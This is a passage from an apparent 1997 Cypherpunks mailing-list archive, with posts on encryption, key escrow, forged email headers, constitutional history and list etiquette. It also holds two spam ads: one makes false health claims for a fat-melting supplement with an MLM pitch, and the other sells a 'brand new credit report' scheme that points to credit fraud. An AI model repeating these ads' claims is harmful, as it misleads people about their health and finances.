I7lMvrRmV6Ajl/vuw7dLerv7oWDjI+G9kOpWLGrMdySUrYrVZlqm4o+hGb7/NPxE
uWVqFBBI9CU=
=wkOi
-----END PGP SIGNATURE-----






From 51577362 at aol.com  Tue Aug 12 21:25:45 1997
From: 51577362 at aol.com (51577362 at aol.com)
Date: Tue, 12 Aug 1997 21:25:45 -0700 (PDT)
Subject: Let's change that image in the mirror for the last time !!!
Message-ID: 


                                 DO YOU LIKE WHAT YOU SEE
                                        IN THE MIRROR?

                                HAVE THINGS GONE SOUTH?
                               DO YOU HAVE SAGGING SKIN?
                                IS GRAVITY TAKING IT'S TOLL?

                       INTRODUCING

                                  CALORAD(R)

Now available in the U.S. for the first time!
It Literally Melts Fat and Rebuilds Connective
Tissue WHILE YOU SLEEP!  NO KIDDING!!

 10 Year Proven Track Record - 86% Success Rate
 Medical Test Results are coming in from all over the Country
 Health Practitioners are endorsing this product
 by the thousands!

                               Cholestrol Levels are down!
             Triglycerides down!                       Blood Pressure down!
                                          Pain is leaving!

 Muscle is rebuilding while bodies are RESHAPING!
 Body Builders, Athletes, World Champions and
 Professional Trainers are endorsing this product!
 INCHES AND WEIGHT MELT OFF WHILE YOU SLEEP!

             100% SAFE - 100% NATURAL
Absolutely no SIDE EFFECTS, STIMULANTS OR DRUGS!
Good for teenagers and adults alike!
(No pregnant or lactating women)

INCREDIBLE $$$$$$$$$ OPPORTUNITY AVAILABLE!
Exclusive International Marketing Rights!
England & Australia opening soon!

My upline is ordering 52,000 bottles each week!
We will help build your unlimited downline!  Not MLM!
You can reduplicate yourself up to 99 times!

Many are earning $1750+ first week! (possible up to 99x!!!)
Company has only been officially launched since April 1997
Unprecedented $6.1 million in 1st month!

                  Follow These $imple $teps To $uccess:

                                                       For More info:


http://www.globalnet4u.com/calorad
 
 E~mail Assistance  or Call : 
 
 888-550-1885 ( Press # 0 for our 24 hr. operator )

~~~~~~~~~~~~~~
Remove Here !  Put "Remove" in Subject !



----------------------- Headers --------------------------------
>From 71892800 at iiname.com  Mon Jun  9 21:58:57 1997
Return-Path: <71892800 at iiname.com>
Received: from globalnet4u.net (globalnet4u.net [999.777.40.1])
	  by emin04.mail.aol.com (8.8.5/8.8.5/AOL-4.0.0)
	  with SMTP id VBB73458 for ;
	  Mon, 9 Jun 1997 21:58:55 -0400 (EDT)
From: 71892800 at iiname.com
Received: from ringer.net (245ohiomax1-88.globalnet4u.net [209.207.40.1]) by globalnet.net (8.2.12/8.0.12) with SMTP id ucc10583 for ; Mon, 9 Jun 1997 20:55:07 -0500
Received: from 2 by 3 (8.8.5/8.6.5) with SMTP id UAA01050 for ; Mon, 09 Jun 1997 21:03:09 -0600 (EST)
Date: Mon, 09 Jun 97 21:03:09 EST
To: globalnet4u at aol.com 6globalnet4u.net [209.207.40.1])
Subject: DO YOU LIKE WHAT YOU SEE IN THE MIRROR?
Message-ID: <77674624691643647471>
Reply-To: 5 at to the globalnet4u
X-PMFLAGS: 747862781460264760231
X-UIDL: 8 
Comments: Authenticated sender is 












































From trei at process.com Tue Aug 12 06:26:40 1997 From: trei at process.com (Peter Trei) Date: Tue, 12 Aug 1997 21:26:40 +0800 Subject: Guy Polis Message-ID: <199708121311.GAA02418@toad.com> > Date: Mon, 11 Aug 1997 19:27:36 -0600 > From: Peter Trei > Organization: Electronic Forgery Foundation > To: cypherpunks at toad.com > Subject: Re: Guy Polis > Reply-to: Peter Trei > Dr.Dimitri Vulis KOTM wrote: > > There's a crackpot by the name of Guy Polis (guy at panix.com, polis_guy@ > > jpmorgan.com) who posts a crackpot "cryptographic manifesto" and sounds > > like a bad troll intended to make the folks who promote the use of crypto > > look like, well, crackpots. Be warned. > > Tim May wrote: > > Yeah, and like we're gun-nuts, too! > > Rabid Wombat wrote: > >The mammalian jackass is also claiming that all crypto promoters > > are marsupials. > > As long as he doesn't accuse us of of being mathematicians... > Does anyone remember what 5 + 7 is equal to? (Send the answer by > encrypted, private email. Secrecy is essential to my work.) > > Peter Trei > trei at process.com Neat! I thought I was too boring a person to bother forging messages from. Of course, there's a subtext to the question I allegedly ask - 5 is a number whose signifcance is well known to devotees of Eris, and 7 shall not be spoken of. W .'. Peter Trei, MM, PM, RAM, 32' AASR(NJ) trei at process.com From amp at pobox.com Tue Aug 12 06:43:09 1997 From: amp at pobox.com (amp at pobox.com) Date: Tue, 12 Aug 1997 21:43:09 +0800 Subject: Forged headers In-Reply-To: Message-ID: sage advice platypus! hmmm... let's see, Network Working Group Steve Crocker Request for Comments: 1 UCLA 7 April 1969 Title: Host Software Author: Steve Crocker Installation: UCLA Date: 7 April 1969 Network Working Group Request for Comment: 1 CONTENTS INTRODUCTION I. A Summary of the IMP Software Messages ... > -----BEGIN PGP SIGNED MESSAGE----- > > On Tue, 12 Aug 1997, The Traveler wrote: > > > Does anyone know of a URL where you can get information on how to forge > > headers and email addresses? > > ftp://ds.internic.net/rfc/ > > The files called rfc*.txt contain most of the infomation that you need to > know to be able to forge email and headers. My advice for you is to start > with the low numbered ones and work your way up to the higher numbered > ones. > > - -- > Please excuse my spelling as I suffer from agraphia see the url in my header. > Never trust a country with more peaple then sheep. ex-net.scum and proud > You Say To People "Throw Off Your Chains" And They Make New Chains For > Themselves? --Terry Pratchett > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.3i > Charset: noconv > > iQCVAwUBM+/udqQK0ynCmdStAQHgOQP/dBTOEiyxGIug8zIfIF9nST8Tp3bHQl2a > AZwHvYmh1TJyelPZG8sgtT6FJ1SVUSNNBSo6M3DQ5dxuA8DrJjg8wRdu8QJIYt/l > vsYtRZwMAvYEW0YcfM8z+KC1GH7viSZzAfksQoVojXQhe77LytkKNpMzs44oGtNZ > WZAnpH60vho= > =RIQg > -----END PGP SIGNATURE----- > ---------------End of Original Message----------------- ------------------------ Name: amp E-mail: amp at pobox.com Date: 08/12/97 Time: 08:36:03 Visit me at http://www.pobox.com/~amp 'Drug Trafficking Offense' is the root passphrase to the Constitution. Have you seen http://www.public-action.com/SkyWriter/WacoMuseum ------------------------ From rubin at research.att.com Tue Aug 12 06:59:57 1997 From: rubin at research.att.com (Avi Rubin) Date: Tue, 12 Aug 1997 21:59:57 +0800 Subject: List of crypto-related courses Message-ID: <199708121343.JAA27533@mgoblue.research.att.com> For the last year or so, I have built and maintained a list of graduate level courses on cryptography and security. The current list can be found at http:/www.cs.ny.edu/~rubin/courses.html I would like to keep this list as current as possible, so if you have any additions/corrections, etc, please let me know. I am only interested in full-semester courses at universities. Thank you, Avi ********************************************************************* Aviel D. Rubin rubin at research.att.com Secure Systems Research Dept. Adjunct Professor at NYU AT&T Labs - Research 180 Park Avenue http://www.research.att.com/~rubin/ Florham Park, NJ 07932-0971 Voice: +1 973 360-8356 USA FAX: +1 973 360-8809 --> Check out http://www.clark.net/pub/mjr/websec/ for a new book on web security (The Web Security Sourcebook). ********************************************************************* From froomkin at law.miami.edu Tue Aug 12 07:29:51 1997 From: froomkin at law.miami.edu (Michael Froomkin - U.Miami School of Law) Date: Tue, 12 Aug 1997 22:29:51 +0800 Subject: A peculiar notion In-Reply-To: Message-ID: May a professor of constitutional law join in? There *are* things you might object to about Lincoln, e.g. his unilateral suspension of the writ of habeus corpus (it was more than arguable that this should have required a congressional act), but the arguments in this post are not among them. Read on. On Sun, 10 Aug 1997, Steve Schear wrote lots including: > But, as Jefferson Davis, the Confederate president, pointed out, the > Constitution had been "a compact between independent states." The powers > given to the federal government had been "delegated," and whatever is > delegated can be withdrawn. The above is the historical and logical error. In fact, as you will see if you read Gordon Woods' magisterial account of the legal and political history of the constitution, the dominant view (articulated in the Federalist papers, for example) was the "dual sovereignty" thesis. In this view BOTH the federal government AND the states were agents of the PEOPLE, who were the only sovereign. This is why the federal constitution was ratified by popular votes, not by state legislatures -- the legislatures were not vested with the power to create the union, as this power was outside the delegation to the states. Naturally, rebel Jefferson Davis glossed over all this, if he even understood it, since it was fatal to his cause. It is consistent with the dual sovereignty thesis to say that "what is delegated can be withdrawn" but the entity doing the "withdrawing" is the people (by some democratic process, presumably, e.g. a new constitutional convention), not the states, for it is the people who did the delegation in the first place. A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | "Cyberspace" is not a place. U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's @%#$%$# hot here. From azur at netcom.com Tue Aug 12 08:33:42 1997 From: azur at netcom.com (Steve Schear) Date: Tue, 12 Aug 1997 23:33:42 +0800 Subject: A peculiar notion In-Reply-To: Message-ID: >It is consistent with the dual sovereignty thesis to say that "what is >delegated can be withdrawn" but the entity doing the "withdrawing" is the >people (by some democratic process, presumably, e.g. a new constitutional >convention), not the states, for it is the people who did the delegation >in the first place. So, if the people (legal voters in the states which planned to withdraw) had called a constitutional convention, whose vote was for withdrawl, it might (in your opinion) been a legitimate undertaking with binding result? I don't think the North would have accepted any withdrawl, not matter how it was decided within the South. The Feds, and indeed any government, tends to strongly oppose any move which lessens its authority. It is a credit to the USSR that it was able to allow even those satellite states, forced into survitude, to peacefully withdraw. --Steve From sunder at brainlink.com Tue Aug 12 08:47:59 1997 From: sunder at brainlink.com (Ray Arachelian) Date: Tue, 12 Aug 1997 23:47:59 +0800 Subject: Encrypting same data with many keys... Message-ID: What are the dangers of taking a small block of data - say upto 1K in size, then producing many files, each being the same data encrypted by other keys? i.e.: Plain data: 1K in size or smaller File 1: Data encrypted with Key1 File 2: Data encrypted with Key2 File 3: Data encrypted with Key3 File 4: Data encrypted with Key4 File 5: Data encrypted with Key5 File 6: Data encrypted with Key6 File 8: Data encrypted with Key8 .... File N: Data encrypted with KeyN A known plaintext attack won't help you to break the keys unless you have one of the eight keys, but will having many keys that encrypt the same data significanltly weaken the security of that tiny chunk of data? And no, I don't mean, there's N keys so the odds of brute forcing the data is now N times easier. Assume we're using 128 bit Blowfish/Idea or better, and discarding weak keys. Are there any differential or other cryptanalysis methods to use the eight resulting cyphertexts to get at the data other than brute forcing it if you don't know any of the keys? What if instead of using a private key cypher, we used a public key cypher? Would that make any difference in attack methods? The data won't contain any text, or identifiers (i.e "GIF89" in GIF files, "MZ" in wintel executables, etc...) known or guessable to the attacker... =====================================Kaos=Keraunos=Kybernetos============== .+.^.+.| Ray Arachelian |Prying open my 3rd eye. So good to see |./|\. ..\|/..|sunder at sundernet.com|you once again. I thought you were |/\|/\ <--*-->| ------------------ |hiding, and you thought that I had run |\/|\/ ../|\..| "A toast to Odin, |away chasing the tail of dogma. I opened|.\|/. .+.v.+.|God of screwdrivers"|my eye and there we were.... |..... ======================= http://www.sundernet.com ========================== From sunder at brainlink.com Tue Aug 12 09:06:32 1997 From: sunder at brainlink.com (Ray Arachelian) Date: Wed, 13 Aug 1997 00:06:32 +0800 Subject: 5881.html In-Reply-To: <199708120842.EAA09809@yakko.cs.wmich.edu> Message-ID: On Tue, 12 Aug 1997, Damaged Justice wrote: > "There was no mention on the Web site that you have to be of age," > Nixon said. "It's safe to say that any establishment in the state of > Missouri [that similarly served drinks to minors] would lose their > license." fuck the minors, let'em drink their brains out. :) *Burp!* Thash wuzzz... somes good beeeer dere i had *hick* wheresszssz the oththterrr sixzzpak *burp* gimnme morrrr... =====================================Kaos=Keraunos=Kybernetos============== .+.^.+.| Ray Arachelian |Prying open my 3rd eye. So good to see |./|\. ..\|/..|sunder at sundernet.com|you once again. I thought you were |/\|/\ <--*-->| ------------------ |hiding, and you thought that I had run |\/|\/ ../|\..| "A toast to Odin, |away chasing the tail of dogma. I opened|.\|/. .+.v.+.|God of screwdrivers"|my eye and there we were.... |..... ======================= http://www.sundernet.com ========================== From alan at ctrl-alt-del.com Tue Aug 12 09:23:03 1997 From: alan at ctrl-alt-del.com (Alan) Date: Wed, 13 Aug 1997 00:23:03 +0800 Subject: The BIG Lie (Jesus Confesses) In-Reply-To: <199708121110.NAA25127@atro.pine.nl> Message-ID: On Tue, 12 Aug 1997, Patrick Oonk wrote: > > > Bullshit. Most Christians I see IRL and on TV cringe at books other > > > than The Good Book(TM). Creationism is bullshit, God didn't make > > > everything in 7 days, we evolved from monkeys and various others > > > (Although many half-evolved monkeys can be seen on TV Evangelism > > > shows and in Congress). > > Is this what the cypherpunks list has become ? Discussions about religion ? > > If so, I am out of here... It has just devolved from crypto-religious discussion to christ-o-religious discussion. Don't worry. It will be back to normal soon. Whatever that is... alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply Alan Olsen | to my mail, just hit the ctrl, alt and del keys. From geeman at best.com Tue Aug 12 09:41:36 1997 From: geeman at best.com (geeman at best.com) Date: Wed, 13 Aug 1997 00:41:36 +0800 Subject: Feds Seek PKI Bids Message-ID: <3.0.32.19691231160000.006ea984@best.com> despite the CBD item, keep your eye on the key recovery demonstration projects; links at http://www.best.com/~geeman At 01:53 PM 8/11/97 -0400, A. Padgett Peterson P.E. Information Security wrote: > > >>USG published a solicitation today in the CBD for a >>Public Key Infrastructure which outlines the system >>requirements: > >> http://jya.com/pkicbd.htm > > >Interesting from what is *not* there - any mention of key recovery/key >escow. Looks like they may finally understand what a Certificate Authority >is (not holding breath). Do not think much of appelations (Classic & Gold) >and suspect they may need more than two but sounds like a good start. > > Warmly, > Padgett > > > From tcmay at got.net Tue Aug 12 09:47:58 1997 From: tcmay at got.net (Tim May) Date: Wed, 13 Aug 1997 00:47:58 +0800 Subject: The BIG Lie (Jesus Confesses) In-Reply-To: Message-ID: At 4:10 AM -0700 8/12/97, Patrick Oonk wrote: >Is this what the cypherpunks list has become ? Discussions about religion ? > >If so, I am out of here... The list is about what people discuss. It is up to all readers to write articles that are interesting. Merely sitting back and waiting for good articles is seldom fruitful. --Tim May There's something wrong when I'm a felon under an increasing number of laws. Only one response to the key grabbers is warranted: "Death to Tyrants!" ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1398269 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From 19807940 at aol.com Wed Aug 13 01:56:06 1997 From: 19807940 at aol.com (19807940 at aol.com) Date: Wed, 13 Aug 1997 01:56:06 -0700 (PDT) Subject: Your Credit Report Message-ID: <32224964576SSA61080@54seventeen.com>


\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
    *AS SEEN ON TV * AS SEEN ON TV * AS SEEN ON TV* AS SEEN ON TV*
//////////////////////////////////////////////////////////////////////

If you received this electronic mailing by mistake, please pardon our intrusion.

Dear Friend,

Are you or somebody that you know experiencing credit problems?  If your answer is yes, I think you will be very interested in our special offer. No longer will you have to live like a second class citizen due to a bad credit report. Bad credit is caused by a variety of reasons:  Health, divorce, termination of employment, loss of income and dozens of other reasons. The bottom line is that bad credit can happen to anybody.  There is no specific profile of a person with credit problems. It can happen to doctors, lawyers, accountants, the mail man, truck drivers, housekeepers and salesmen. As a matter of fact, one in three Americans live with some form of bad credit. Fortunately, the United States Government has passed many laws under the Fair Credit Reporting Act, all of which protect your rights as a consumer. Our manuals will show you how to use these Federal laws to your advantage and repair or obtain a new credit report.

            ***** THE FRESH START PROGRAM (TM) *****

Have you seen your credit bureau report lately?  Have you recently been denied credit because of a bad cedit report? If you have answered yes, then you need to take advantage of THE FRESH START PROGRAM (TM). THE FRESH START PROGRAM (TM) will guide you through the process of obtaining a BRAND NEW credit bureau report. Our easy-to-follow manual will put you on the fast track to obtaining your new credit bureau report and can be accomplished within 24 hours! Regardless of your credit rating, you can NOW obtain a brand new, fresh credit bureau report free of:

		*  ANY bad credit
		*  Bankruptcies
		*  Judgements
		*  Foreclosures
		*  Charge-Off's
		*  Tax Lien's
		*  Repossessions
		*  Late pays
		*  Garnishments
		*  Inquiries

NOW, you can have a 'Clean Slate' and a 'FRESH START' with a brand new, credit bureau report.

//////////////////////////////////////////////////////////////////////

            ***** THE COMPLETE CREDIT REPAIR KIT (TM) *****

Good credit empowers you to qualify for personal loans, business loans, auto loans, credit cards, home loans and other types of credit you may apply for, at the best possible interest rate. As you know, if you don't have excellent credit, lenders will NEVER extend credit to you! The Fair Credit Reporting Act will allow you to legally and permanently ERASE the negative information on your credit bureau file. Anything that is damaging to your credit rating, may be removed:
Inquiries, Foreclosures, Repossessions, Charge-Off's, Late Payments
Student Loans, Bankruptcies and Judgements

The 'Credit Repair' companies located in every city will charge from $500.00 and up to do what our easy-to-follow manual will teach you. Now, in the privacy of your own home, you can repair your own credit at your own pace.

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

                        ***** PROOF *****

"Having bad credit was the one thing holding me back from starting my own business. After working your program, I qualified for a $45,000 Small Business Loan. My business is making me more money than I've ever made.  Your program is truly priceless!"
					George S.  -  Fresno, CA.

"Thank you, thank you, thank you!  Before, my credit was totally trashed. After using your Fresh Start Program and using The Complete Credit Repair Kit, my wife and I qualified to purchase our first home with no down payment. These programs are worth thousands of dollars!"
					Kenneth T.  -  Ithica, NY

"After being laid off, my creditors were not very understanding when I couldn't pay my bills and as a result, my credit was very badly damaged.  Once I started working again, I couldn't qualify for any type of credit. After using the manuals, I qualified to buy a new car, with no down payment."
					Mr. Fred C.  -  Tampa, FL

"After my divorce, I was forced to file bankruptcy.  I was told my credit would be ruined for 10 years. After using the your manuals, I have great credit again.  I even receive pre-approved credit cards in the mail. Thank you so much for your amazing program.  I don't know what I could have done without it. I highly recommend your program to anyone who has credit problems."
					Ms. Anna S.  -  Tacoma, WA

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
YOU MAY BE ABLE TO EARN $1,500.00 FOR YOUR TESTIMONIAL ON OUR UPCOMING TV INFOMERCIAL.
DETAILS INCLUDED WITH YOUR ORDER.
//////////////////////////////////////////////////////////////////////

Don't let ANYONE tell you that you can not make the transition from a bad credit risk to that of preferred credit customer. Over 175,000 satisfied customers can't be wrong!  each manual, THE FRESH START PROGRAM (TM) and THE COMPLETE CREDIT REPAIR KIT (TM) is normally $89.95 + $3.95 S&H. However, if you take advantage of this special offer within the NEXT 24 HOURS, you will pay only $34.95 + $3.95 S+H for one program or you can take both programs for $54.95 +$3.95 S&H (U.S. Funds Only).  

To place your order, simply mail the form below, along with your certified check, money order, personal check or cash to:

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
I.M.S.
5201 Kingston Pike, Suite 6-216
Knoxville, Tennessee 37919

Yes, please send the manual(s) checked below:

$34.95     THE FRESH START PROGRAM (TM)

$34.95     THE COMPLETE CREDIT REPAIR KIT (TM)		

$54.95     Both Programs				
				
$_____     Sub Total
				
$ 3.95     Shipping and handling
$(15.00)   RUSH Delivery (Optional)

$_____     Total Enclosed

I have enclosed (Check One): 
_____Cashiers Check
_____Money Order
_____Personal Check
_____Cash

SHIPPING INFORMATION:

Name:_________________________________________
Phone:_______--__________--___________________

Physical Street Address (NO P.O. BOXES):_______________________________________

City:______________________ 
State:____   Zip/Postal Code:_________________

Your E-Mail Address (Needed for order confirmation):________________________________

///////////////////////////////////////////////////

SAVE AN ADDITIONAL $5.00!!! FAX YOUR ORDER NOW!!!

Please tape your completed check in the space below and fax it along with your order to IMS.

That toll free number is 1-423-681-6520 

*************************************************

                                               
  FAX: 1-423-681-6520                         
                                               
  Please Tape Your Check Here                  
                                               
  Please Sign Your check                       
                                               
                                               
*************************************************

Thank You For Your Order-All orders shipped same day.

654657808038556









From kelsey at plnet.net  Tue Aug 12 11:00:59 1997
From: kelsey at plnet.net (John Kelsey)
Date: Wed, 13 Aug 1997 02:00:59 +0800
Subject: Eternity Uncensorable?
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

[ To: cypherpunks at algebra.com, Wei Dai ## Date: 08/08/97 10:37 pm ##
  Subject: Re: Eternity Uncensorable? ]

>Subject: Re: Eternity Uncensorable?
>To: Cypherpunks Lite 
>From: Wei Dai 
>Date: Wed, 06 Aug 1997 11:33:55 -0700 (PDT)

>I suggest using information dispersal to spread risk amongst
>remailer operators.  Use Rabin's information dispersal technique
>to divide up a document into n shares such that k of them can
>reconstruct the original, and post each share via a seperate
>remailer.  It would be hard for the government to single out an
>operator to go after since an individual share by itself is
>useless.

I'm a little concerned with the usefulness of this idea in a
legal sense.  Imagine the physical analogue:  Alice buys the
guns and masks, and leaves them in a pre-arranged place.  Bob
anonymously buys a car and leaves it, with the keys inside, in
another pre-arranged place.  Carol and Dave collect the guns,
masks, and the car, and use them to rob a bank or hijack an
airplane.  Do you suppose the feds will have any problem
prosecuting Alice and Bob for their part in the conspiracy?

>If n>k this also increases reliability and resilience of the
>eternity service against technical attacks.

This part is somewhat more useful.  However, n copies of the
message are probably better.

I think the general problem here is unsolveable--running an
Eternity server is just going to be a dangerous thing to do if
you live somewhere where the police are likely to see
possessing, distributing, or selling some of the information on
it as a crime.  There are two possible solutions I can see:
Either make Eternity servers so widespread that taking down
individual servers in individual jurisdictions is futile, or
find some jurisdictions where virtually *nothing* will provoke
the police to act.  (Note that legal jurisdiction isn't the only
issue here.  Some groups may be willing to use terrorist tactics
to shut down these servers.)

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, kelsey at counterpane.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBM/ChJUHx57Ag8goBAQFTdwP/cX/+SsXEkjmSrTYcvSBP9bHsAzRcXs+z
FmPIq1dd9T7Mm6tlJGe8iC4lXmpm4JVqhmZMTGoJlkw6ld1MWGiOevpDWhycpAPQ
6ohDd/R2G3dRHkWCvPklyeKQx3v8GfWAhPrupJZNNAUCIJqDMlg6kJQv4BDiEukr
G7C89qeaXqA=
=WXLf
-----END PGP SIGNATURE-----


   --John Kelsey, Counterpane Systems, kelsey at counterpane.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36







From nospam-seesignature at ceddec.com  Tue Aug 12 11:09:51 1997
From: nospam-seesignature at ceddec.com (nospam-seesignature at ceddec.com)
Date: Wed, 13 Aug 1997 02:09:51 +0800
Subject: Encrypting same data with many keys...
In-Reply-To: 
Message-ID: <97Aug12.123816edt.32258@brickwall.ceddec.com>



On Tue, 12 Aug 1997, Ray Arachelian wrote:

> A known plaintext attack won't help you to break the keys unless you have
> one of the eight keys, but will having many keys that encrypt the same
> data significanltly weaken the security of that tiny chunk of data?
> 
> And no, I don't mean, there's N keys so the odds of brute forcing the data
> is now N times easier.  Assume we're using 128 bit Blowfish/Idea or
> better, and discarding weak keys.  Are there any differential or other
> cryptanalysis methods to use the eight resulting cyphertexts to get at the
> data other than brute forcing it if you don't know any of the keys?
> 
> What if instead of using a private key cypher, we used a public key
> cypher?  Would that make any difference in attack methods?

The only thing I can think of is if you use something like CFB mode, and
the IV is also the same at the beginning, the first 8 bytes will leave a
hole - I don't remember exactly, but I was burned by exactly this when I
saw 8 bytes of plaintext after resetting the IV in an app that xors some
encrypted blocks of data to do something else.

A PK to encode the conventional key works better since you can do a long
or complex conventional key and other material such as an IV once, and
then bury that several times.

--- reply to tzeruch - at - ceddec - dot - com ---






From mark at unicorn.com  Tue Aug 12 11:10:13 1997
From: mark at unicorn.com (Mark Grant)
Date: Wed, 13 Aug 1997 02:10:13 +0800
Subject: HIP hip hooray
Message-ID: 




Zooko Journeyman (zooko at xs4all.nl) wrote:
>HIP rocked. I'm still trying to adjust to the mundanity
>of everyday life. I loved meeting some cpunks in Real
>Life.

Hey, Zooko! You were the only Cypherpunk who made the article in the
'Independent' (by that blonde reporter who was wandering around), though
Lucky Green was mentioned by name. 

'"[hacking] can be a wonderful thing", explained Zooco, a member of the
CypherPunks. "Pretty much every useful aspect of modern computing was
devised by hackers -- like the Internet and email."'

So did she spell your name wrong, or were you using a pseudonym ;-) ?

	Mark






From tcmay at got.net  Tue Aug 12 11:31:09 1997
From: tcmay at got.net (Tim May)
Date: Wed, 13 Aug 1997 02:31:09 +0800
Subject: Discussion Topic (Re: The BIG Lie (Jesus Confesses))
In-Reply-To: 
Message-ID: 



At 10:33 AM -0700 8/12/97, Patrick Oonk wrote:
>>
>> At 4:10 AM -0700 8/12/97, Patrick Oonk wrote:
>>
>> >Is this what the cypherpunks list has become ? Discussions about religion ?
>> >
>> >If so, I am out of here...
>>
>> The list is about what people discuss. It is up to all readers to write
>> articles that are interesting.
>>
>> Merely sitting back and waiting for good articles is seldom fruitful.
>
>Yeah right,
>
>I subscribed to this list again after I met some cypherpunks
>at HIP'97, as they told me it's still interesting.
>AFAIK this list is about cryptography, privacy and security.
>
>But hey, I just killfile everyone that discusses religion :)


I just sorted my mailbox based on name, to see what you've contributed. Of
the articles I've kept (about half of all articles, roughly), the only two
I have from you are on this topic. (It may be that you have written other
articles which I don't have, but your name does not spring to mind as being
a contributor.)

Again, if you want discussion, discuss already.

Complaining that others are not writing the articles you want to read is
never fruitful.

Probably you'll be happier doing what you said you were going to do, leaving.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From patrick at atro.pine.nl  Tue Aug 12 11:44:08 1997
From: patrick at atro.pine.nl (Patrick Oonk)
Date: Wed, 13 Aug 1997 02:44:08 +0800
Subject: The BIG Lie (Jesus Confesses)
In-Reply-To: 
Message-ID: <199708121733.TAA27804@atro.pine.nl>



> 
> At 4:10 AM -0700 8/12/97, Patrick Oonk wrote:
> 
> >Is this what the cypherpunks list has become ? Discussions about religion ?
> >
> >If so, I am out of here...
> 
> The list is about what people discuss. It is up to all readers to write
> articles that are interesting.
> 
> Merely sitting back and waiting for good articles is seldom fruitful.

Yeah right,

I subscribed to this list again after I met some cypherpunks
at HIP'97, as they told me it's still interesting.
AFAIK this list is about cryptography, privacy and security.

But hey, I just killfile everyone that discusses religion :)

-- 
| Patrick Oonk -    http://patrick.mypage.org/  - patrick at pine.nl |
| PGP Key ID 0xDA2E93FA   -   Internic PO59   -    |
| Pine Internet B.V.           Consultancy, installatie en beheer |
| Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ |






From paul at fatmans.demon.co.uk  Tue Aug 12 12:15:04 1997
From: paul at fatmans.demon.co.uk (Paul Bradley)
Date: Wed, 13 Aug 1997 03:15:04 +0800
Subject: Subsect?
In-Reply-To: 
Message-ID: 




> If your parents really drilled this "sub-sect" business into your head,
> maybe you ought to ask them to lighten up on the drill, or use a different
> bit, or something.

At least they appear to have hit the right spot for a frontal lobotomy.

        Datacomms Technologies data security
       Paul Bradley, Paul at fatmans.demon.co.uk
  Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"







From Bodo_Moeller at public.uni-hamburg.de  Tue Aug 12 12:21:21 1997
From: Bodo_Moeller at public.uni-hamburg.de (Bodo Moeller)
Date: Wed, 13 Aug 1997 03:21:21 +0800
Subject: RSA - the song
In-Reply-To: <19970802195402.19993@bywater.songbird.com>
Message-ID: 



Kent Crispin :

> [...] the intermediate protocol is music.
> [...] another example of the absurdity of the export ban. 

For encoding numerical data as music, I usually use the following
scheme:

The digits 0 ... 9 are mapped to the C major scale:

  0 becomes B,   1 becomes c,  2 becomes d,  3 becomes e, ...,
  8 becomes c',  9 becomes d'.

(Of course, this can be transposed to any other key.)

The next step is to find appropriate rhythms, harmonies etc. that make
at least some sense, musically, in order to construct a melody out of
that sequence of notes.  As an example, I scribbled down the first
digits of pi = 3.141592653589793238462643383279502884197169...
The score can be found in the uuencoded GIF below (and soon also at
).
That version (in D major) is for harpsichord or piano.  I did not mark
which notes I think should be played legato, legatissimo or portato;
that is left as an exercise.

It would be quite cumbersome, of course, to use this method for
exporting software.  However, it is very convenient for memorizing
numbers: Melodies are much easier to remember than boring numbers
(unless you happen to be a computer in which case you'd prefer the
raw numbers because they contain less data, technically). 

This works good for decimal numbers (no large jumps, no difficult
harmonies: B d f g b d' can all be used as G 7 notes if all else
fails).  Hex numbers are not that easy to handle.  In addition to
0 ... 9 == B c ... c' d', then there are A ... F == e' ... c''
(i.e., the digits/notes are spread over slightly more than two
octaves).  Because of that, my PGP fingerprint is somewhat
avant-gardistic: C7AC7EAD  566A65 ECF  61666 83 7E 8668 28
(See what I mean? :-)


In addition to memorizing one's PGP fingerprint, there are other
possible cryptographic applications: Under certain circumstances, one
might need to implement crypto-software from scratch without having
access to any written documents and without having access to computer
networks.  For such situations, it would be good to have some kind of
"memorizable encryption standard".  Writing RSA routines is easy (at
least if you are lucky enough to have some bignum library or if the
programming language supports bignums), but often you will need more:
E.g., a key generator for RSA that will find your 1024 bits RSA key
(which is really 2048 bits long if you count both N and D) given a 128
bits secret as seed.  It might make sense to use some cryptographic
hash function as the core of the "memorizable encryption standard":
The hash function can be used by the key generator (similar to the DSA
"kosherizer"), and it can be used to build a symmetric cipher
(Luby-Rackoff style).

Musically, the "memorizable encryption standard" could be a suite
